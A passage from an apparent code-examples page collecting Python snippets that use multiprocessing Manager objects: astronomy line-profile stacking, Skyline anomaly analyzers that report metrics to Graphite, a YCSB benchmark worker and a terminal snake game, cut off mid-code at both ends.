            else:
                self.bmaj = self.bmin = beam/3600.
                self.bpa = 0
        elif isinstance(beam, (list, tuple)):
            self.bmaj, self.bmin, self.bpa = beam
            self.bmaj /= 3600.
            self.bmin /= 3600.

        elif beam is None:
            try:
                self.bmaj = self.hdr["bmaj"]
                self.bmin = self.hdr["bmin"]
                self.bpa = self.hdr["bpa"]
            except KeyError: 
                self.log.critical("Beam not specified, and no beam information in FITS header")
        else:
            raise TypeError("Beam must be a list, tuple, int or float")

        self.bmajPix = int(self.bmaj/abs( self.wcs.getXPixelSizeDeg() ) )
        self.bminPix = int(self.bmin/abs( self.wcs.getXPixelSizeDeg() ) )

        self.beamPix = self.bmajPix
        self.beam2pix = beam2pix
    
        self.excluded = Manager().Value("d",0)
        self.track = Manager().Value("d",0)
        self.lock = Lock()


    def profile(self, radeg, decdeg, cfreq, weight, pid):
        
        rapix, decpix = self.wcs.wcs2pix(radeg, decdeg)

        cfreqPix = int((cfreq - self.freq0)/self.dfreq )

        zstart = cfreqPix - self.width/2
        zend = cfreqPix + self.width/2

        beamPix = self.beamPix

        ystart, yend = (decpix-beamPix/2.), (decpix+beamPix/2.)
        xstart, xend = (rapix-beamPix/2.), (rapix+beamPix/2.)

        self.log.debug("Line profile {:.3f} {:.3f} {:d}-{:d}".format(rapix, decpix, zstart, zend))
        
        pcube = self.cube[zstart:zend, ystart:yend, xstart:xend]

        # Check if this profile is with stacking

        if pcube.shape != (self.width, beamPix, beamPix):
            padz, pady, padx = (0,0), (0,0), (0,0)
            diffx, diffy, diffz = 0, 0, 0

            if pcube.shape[0] != self.width:
                diffz = self.width - pcube.shape[0]
                if cfreqPix < self.cube.shape[0]/2:
                    padz = diffz, 0
                else:
                    padz = 0, diffz

            if pcube.shape[1] != beamPix:
                diffy = beamPix - pcube.shape[1]
                if ystart<0:
                    pady = diffy, 0
                else:
                    pady = 0, diffy
                
            if pcube.shape[2] != beamPix:
                diffx = beamPix - pcube.shape[2]
                if xstart<0:
                    padx = diffx, 0
                else:
                    padx = 0, diffx

            if diffz > self.width/2 or diffx > beamPix/2 or diffy > beamPix/2:
                self.log.debug("Skipping Profile {:d}, its close too an edge (s).".format(pid))
                self.excluded.value += 1
                return
            else:
                npad = padz, pady, padx
                self.log.debug("Profile {:d} is close an edge(s). Padding the exctracted cube by {:s} ".format(pid, repr(npad)))

                pcube = numpy.pad(pcube, pad_width=npad, mode="constant")
        else:
            self.log.debug("Extracting profile {:d}".format(pid))

        self.lock.acquire()
        self.weights.value += weight
        self.track.value += 1
        self.profiles.append(pcube*weight)
        self.lock.release()
        self.active.value -= 1

        
    def stack(self):

        nprofs = len(self.catalog)
        
        self.log.info("Stacking {:d} line profiles".format(nprofs))

        # Run these jobs in parallel
        procs = []
        range_ = range(10, 110, 10)
        print("Progress:"),

        counter = 0
        while counter <= nprofs-1:
            if self.active >= self.cores:
                continue

            ra, dec, cfreq, w, _id = self.catalog
            proc = Process(target=self.profile, args = (ra, dec, cfreq, w, counter) )
            proc.start()
            procs.append(proc)
            counter += 1
            self.active.value += 1

            nn = int(self.track.value/float(self.nprofs)*100)
            if nn in range_:
                print("..{:d}%".format(nn)),
                range_.remove(nn)
        
        for proc in procs:
            proc.join()

        print("..100%\n")

        self.log.info("Have stackem all")
        self.log.info("{:d} out of {:d} profiles were excluded because they \
were too close to an edge".format(self.excluded.value, nprofs))
        
        stack = numpy.sum(self.profiles, 0)

        if self.beam2pix:
            mask = utils.elliptical_mask(stack[0], self.bmajPix/2, self.bminPix/2, self.bpa)
            stack = utils.gauss_weights(stack, self.bmajPix/2, self.bminPix/2, mask=mask)

        profile = stack.sum((1, 2))/self.weights.value

        return profile


    def fit_gaussian(self, profile):

        nn = len(profile)
        xx = range(nn)
        import scipy.stats as stats
        from scipy.optimize import leastsq

        sigma = 1 #stats.moment(profile, moment=1)
        mu = xx[nn/2]
        peak = profile.max()
        
        def res(p0, x, y):
            peak, mu, sigma = p0
            yf = utils.gauss(x, peak, mu, sigma)
            return y - yf
    
        params = leastsq(res, (peak, mu, sigma), args=(xx, profile))[0]
        
        return params
Ejemplo n.º 35
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.lock = Lock()
        self.exceptions = Manager().dict()
        self.anomaly_breakdown = Manager().dict()
        self.anomalous_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries)

                # If it's anomalous, add it to list
                if anomalous:
                    metric = [datapoint, metric_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except AttributeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Collate process-specific dicts to main dicts
        with self.lock:
            for key, value in anomaly_breakdown.items():
                if key not in self.anomaly_breakdown:
                    self.anomaly_breakdown[key] = value
                else:
        	        self.anomaly_breakdown[key] += value

            for key, value in exceptions.items():
                if key not in self.exceptions:
                    self.exceptions[key] = value
                else:
        	        self.exceptions[key] += value

    def run(self):
        """
        Called when the process intializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(self.exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % self.exceptions)
            logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))


            # Reset counters
            self.anomalous_metrics[:] = []
            self.exceptions = Manager().dict()
            self.anomaly_breakdown = Manager().dict()

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
Ejemplo n.º 36
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()
            sock.connect((settings.CARBON_HOST.replace('http://', ''), settings.CARBON_PORT))
            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = i * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.
        """
        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
                continue

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Write anomalous_metrics to static webapp directory
            filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
            with open(filename, 'w') as fh:
                # Make it JSONP with a handle_data() function
                anomalous_metrics = list(self.anomalous_metrics)
                anomalous_metrics.sort(key=operator.itemgetter(1))
                fh.write('handle_data(%s)' % anomalous_metrics)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human)
                self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
Ejemplo n.º 37
0
class YCSBWorker(object):
    def __init__(self, access_settings, remote, test, ycsb):
        self.workers = access_settings.workers
        self.remote = remote
        self.test = test
        self.timer = access_settings.time
        self.ycsb = ycsb
        self.shutdown_event = self.timer and Event() or None
        self.ycsb_result = Manager().dict({key: [] for key in ['Throughput', 'READ_95', 'UPDATE_95', 'INSERT_95', 'SCAN_95']})
        self.ycsb_logfiles = Manager().list()
        self.task = self.ycsb_work

    def time_to_stop(self):
        return (self.shutdown_event is not None and
                self.shutdown_event.is_set())

    def ycsb_work(self, mypid):
        flag = True
        log_file = '{}_{}.txt'.format(self.ycsb.log_path +
                                      self.ycsb.log_file, str(mypid))
        self.ycsb_logfiles.append(log_file)
        self.run_cmd = self.test.create_load_cmd(action="run", mypid=mypid)
        self.run_cmd += ' -p exportfile={}'.format(log_file)
        try:
            while flag and not self.time_to_stop():
                self.remote.ycsb_load_run(self.ycsb.path,
                                          self.run_cmd,
                                          log_path=self.ycsb.log_path,
                                          mypid=mypid)
                flag = False
        except Exception as e:
            raise YCSBException(' Error while running YCSB load' + e)

    def pattern(self, line):
        ttype, measure, value = map(str.strip, line.split(','))
        key = ''
        if ttype == "[OVERALL]" and measure == "Throughput(ops/sec)":
            key = 'Throughput'
        elif ttype == "[READ]" and measure == "95thPercentileLatency(us)":
            key = 'READ_95'
        elif ttype == "[UPDATE]" and measure == "95thPercentileLatency(us)":
            key = 'UPDATE_95'
        elif ttype == "[INSERT]" and measure == "95thPercentileLatency(us)":
            key = 'INSERT_95'
        elif ttype == "[SCAN]" and measure == "95thPercentileLatency(us)":
            key = 'SCAN_95'
        else:
            return
        self.ycsb_result[key] += [round(float(value))]

    def parse_work(self, mypid):
        filename = self.ycsb_logfiles[mypid]
        with open(filename, "r") as txt:
            for line in txt:
                self.pattern(line)

    def run(self):
        processes = [Process(target=self.task, args=(x,)) for x in range(self.workers)]
        for p in processes:
            p.start()

        for p in processes:
            p.join()
            if p.exitcode:
                    logger.interrupt('Worker finished with non-zero exit code')

    def parse(self):
        self.task = self.parse_work
        self.run()
        return np.sum(self.ycsb_result['Throughput']), \
            np.mean(self.ycsb_result['READ_95']), \
            np.mean(self.ycsb_result['UPDATE_95']), \
            np.mean(self.ycsb_result['INSERT_95']), \
            np.mean(self.ycsb_result['SCAN_95'])
Ejemplo n.º 38
0
    print()
    system('setterm -cursor on') # Réafficher le curseur si on fait CTRL+C
    exit(0)



snake_list = []
snake_direction = Manager().Value('ctypes.c_char_p', "right")   ## Variable partagée avec l'autre processus
snake_blocks = Manager().Value('i', 2)
game_speed = Manager().Value('f', .5)

posLargSnake = Manager().Value('i', 1)
posLongSnake = Manager().Value('i', 1)

snake_head = Manager().list()
snake_head.append(1)
snake_head.append(2)

point_pos = Manager().list()
score = Manager().Value('i', 0)
game_over = Manager().Value('b', False)
pause = Manager().Value('b', False)
printed_pause = Manager().Value('b', True)
touche = Manager().Value('i', 0)

colored_space = Manager().Value('ctypes.c_char_p', colored(' ', 'grey', 'on_grey'))
colored_snake_body = Manager().Value('ctypes.c_char_p', colored('x', 'green', 'on_green'))
colored_snake_head = Manager().Value('ctypes.c_char_p', colored('x', 'white', 'on_white'))
colored_point = Manager().Value('ctypes.c_char_p', colored('o', 'red', 'on_red'))

signal.signal(signal.SIGINT, quit)
Ejemplo n.º 39
0
class Boundary(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Boundary
        """
        super(Boundary, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=REDIS_SOCKET)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.boundary_metrics = Manager().list()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        if settings.GRAPHITE_HOST != '':
            sock = socket.socket()

            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
            except socket.error:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error('Cannot connect to Graphite at %s' % endpoint)
                return False

            sock.sendall('%s %s %i\n' % (name, value, time()))
            sock.close()
            return True

        return False

    def unique_noHash(self, seq):
        seen = set()
        return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

    # This is to make a dump directory in /tmp if ENABLE_BOUNDARY_DEBUG is True
    # for dumping the metric timeseries data into for debugging purposes
    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        except OSError as exc:
            # Python >2.5
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def spin_process(self, i, boundary_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        # Determine assigned metrics
        bp = settings.BOUNDARY_PROCESSES
        bm_range = len(boundary_metrics)
        keys_per_processor = int(ceil(float(bm_range) / float(bp)))
        if i == settings.BOUNDARY_PROCESSES:
            assigned_max = len(boundary_metrics)
        else:
            # This is a skyine bug, the original skyline code uses 1 as the
            # beginning position of the index, python indices begin with 0
            # assigned_max = len(boundary_metrics)
            # This closes the etsy/skyline pull request opened by @languitar on 17 Jun 2014
            # https://github.com/etsy/skyline/pull/94 Fix analyzer worker metric assignment
            assigned_max = min(len(boundary_metrics), i * keys_per_processor)
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics_and_algos = [boundary_metrics[index] for index in assigned_keys]
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing assigned_metrics_and_algos')
            for assigned_metric_and_algo in assigned_metrics_and_algos:
                logger.info('debug - assigned_metric_and_algo - %s' % str(assigned_metric_and_algo))

        # Compile assigned metrics
        assigned_metrics = []
        for i in assigned_metrics_and_algos:
            assigned_metrics.append(i[0])

        # unique unhashed things
        def unique_noHash(seq):
            seen = set()
            return [x for x in seq if str(x) not in seen and not seen.add(str(x))]

        unique_assigned_metrics = unique_noHash(assigned_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - unique_assigned_metrics - %s' % str(unique_assigned_metrics))
            logger.info('debug - printing unique_assigned_metrics:')
            for unique_assigned_metric in unique_assigned_metrics:
                logger.info('debug - unique_assigned_metric - %s' % str(unique_assigned_metric))

        # Check if this process is unnecessary
        if len(unique_assigned_metrics) == 0:
            return

        # Multi get series
        try:
            raw_assigned = self.redis_conn.mget(unique_assigned_metrics)
        except:
            logger.error("failed to mget assigned_metrics from redis")
            return

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Reset boundary_algortims
        all_boundary_algorithms = []
        for metric in BOUNDARY_METRICS:
            all_boundary_algorithms.append(metric[1])

        # The unique algorithms that are being used
        boundary_algorithms = unique_noHash(all_boundary_algorithms)
        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - boundary_algorithms - %s' % str(boundary_algorithms))

        discover_run_metrics = []

        # Distill metrics into a run list
        for i, metric_name, in enumerate(unique_assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(i)))
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
            except Exception as e:
                exceptions['Other'] += 1
                logger.error("redis data error: " + traceback.format_exc())
                logger.error("error: %e" % e)

            base_name = metric_name.replace(FULL_NAMESPACE, '', 1)

            # Determine the metrics BOUNDARY_METRICS metric tuple settings
            for metrick in BOUNDARY_METRICS:
                CHECK_MATCH_PATTERN = metrick[0]
                check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                pattern_match = check_match_pattern.match(base_name)
                metric_pattern_matched = False
                if pattern_match:
                    metric_pattern_matched = True
                    algo_pattern_matched = False
                    for algo in boundary_algorithms:
                        for metric in BOUNDARY_METRICS:
                            CHECK_MATCH_PATTERN = metric[0]
                            check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                            pattern_match = check_match_pattern.match(base_name)
                            if pattern_match:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug - metric and algo pattern MATCHED - " + metric[0] + " | " + base_name + " | " + str(metric[1]))
                                metric_expiration_time = False
                                metric_min_average = False
                                metric_min_average_seconds = False
                                metric_trigger = False
                                algorithm = False
                                algo_pattern_matched = True
                                algorithm = metric[1]
                                try:
                                    if metric[2]:
                                        metric_expiration_time = metric[2]
                                except:
                                    metric_expiration_time = False
                                try:
                                    if metric[3]:
                                        metric_min_average = metric[3]
                                except:
                                    metric_min_average = False
                                try:
                                    if metric[4]:
                                        metric_min_average_seconds = metric[4]
                                except:
                                    metric_min_average_seconds = 1200
                                try:
                                    if metric[5]:
                                        metric_trigger = metric[5]
                                except:
                                    metric_trigger = False
                                try:
                                    if metric[6]:
                                        alert_threshold = metric[6]
                                except:
                                    alert_threshold = False
                                try:
                                    if metric[7]:
                                        metric_alerters = metric[7]
                                except:
                                    metric_alerters = False
                            if metric_pattern_matched and algo_pattern_matched:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug - added metric - %s, %s, %s, %s, %s, %s, %s, %s, %s' % (str(i), metric_name, str(metric_expiration_time), str(metric_min_average), str(metric_min_average_seconds), str(metric_trigger), str(alert_threshold), metric_alerters, algorithm))
                                discover_run_metrics.append([i, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm])

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing discover_run_metrics')
            for discover_run_metric in discover_run_metrics:
                logger.info('debug - discover_run_metrics - %s' % str(discover_run_metric))
            logger.info('debug - build unique boundary metrics to analyze')

        # Determine the unique set of metrics to run
        run_metrics = unique_noHash(discover_run_metrics)

        if ENABLE_BOUNDARY_DEBUG:
            logger.info('debug - printing run_metrics')
            for run_metric in run_metrics:
                logger.info('debug - run_metrics - %s' % str(run_metric))

        # Distill timeseries strings and submit to run_selected_algorithm
        for metric_and_algo in run_metrics:
            self.check_if_parent_is_alive()

            try:
                raw_assigned_id = metric_and_algo[0]
                metric_name = metric_and_algo[1]
                base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                metric_expiration_time = metric_and_algo[2]
                metric_min_average = metric_and_algo[3]
                metric_min_average_seconds = metric_and_algo[4]
                metric_trigger = metric_and_algo[5]
                alert_threshold = metric_and_algo[6]
                metric_alerters = metric_and_algo[7]
                algorithm = metric_and_algo[8]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacking timeseries for %s - %s' % (metric_name, str(raw_assigned_id)))

                raw_series = raw_assigned[metric_and_algo[0]]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - unpacked OK - %s - %s' % (metric_name, str(raw_assigned_id)))

                autoaggregate = False
                autoaggregate_value = 0

                # Determine if the namespace is to be aggregated
                if BOUNDARY_AUTOAGGRERATION:
                    for autoaggregate_metric in BOUNDARY_AUTOAGGRERATION_METRICS:
                        autoaggregate = False
                        autoaggregate_value = 0
                        CHECK_MATCH_PATTERN = autoaggregate_metric[0]
                        base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            autoaggregate = True
                            autoaggregate_value = autoaggregate_metric[1]

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('debug - BOUNDARY_AUTOAGGRERATION passed - %s - %s' % (metric_name, str(autoaggregate)))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info(
                        'debug - analysing - %s, %s, %s, %s, %s, %s, %s, %s, %s, %s' % (
                            metric_name, str(metric_expiration_time),
                            str(metric_min_average),
                            str(metric_min_average_seconds),
                            str(metric_trigger), str(alert_threshold),
                            metric_alerters, autoaggregate,
                            autoaggregate_value, algorithm)
                    )
                    # Dump the the timeseries data to a file
                    timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm
                    self.mkdir_p(timeseries_dump_dir)
                    timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json"
                    with open(timeseries_dump_file, 'w+') as f:
                        f.write(str(timeseries))
                        f.close()

                # Check if a metric has its own unique BOUNDARY_METRICS alert
                # tuple, this allows us to paint an entire metric namespace with
                # the same brush AND paint a unique metric or namespace with a
                # different brush or scapel
                has_unique_tuple = False
                run_tupple = False
                boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters)
                wildcard_namespace = True
                for metric_tuple in BOUNDARY_METRICS:
                    if not has_unique_tuple:
                        CHECK_MATCH_PATTERN = metric_tuple[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            if metric_tuple[0] == base_name:
                                wildcard_namespace = False
                            if not has_unique_tuple:
                                if boundary_metric_tuple == metric_tuple:
                                    has_unique_tuple = True
                                    run_tupple = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('unique_tuple:')
                                        logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                                        logger.info('metric_tuple: %s' % str(metric_tuple))

                if not has_unique_tuple:
                    if wildcard_namespace:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace:')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                        run_tupple = True
                    else:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace: BUT WOULD NOT RUN')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple)

                if run_tupple:
                    # Submit the timeseries and settings to run_selected_algorithm
                    anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm(
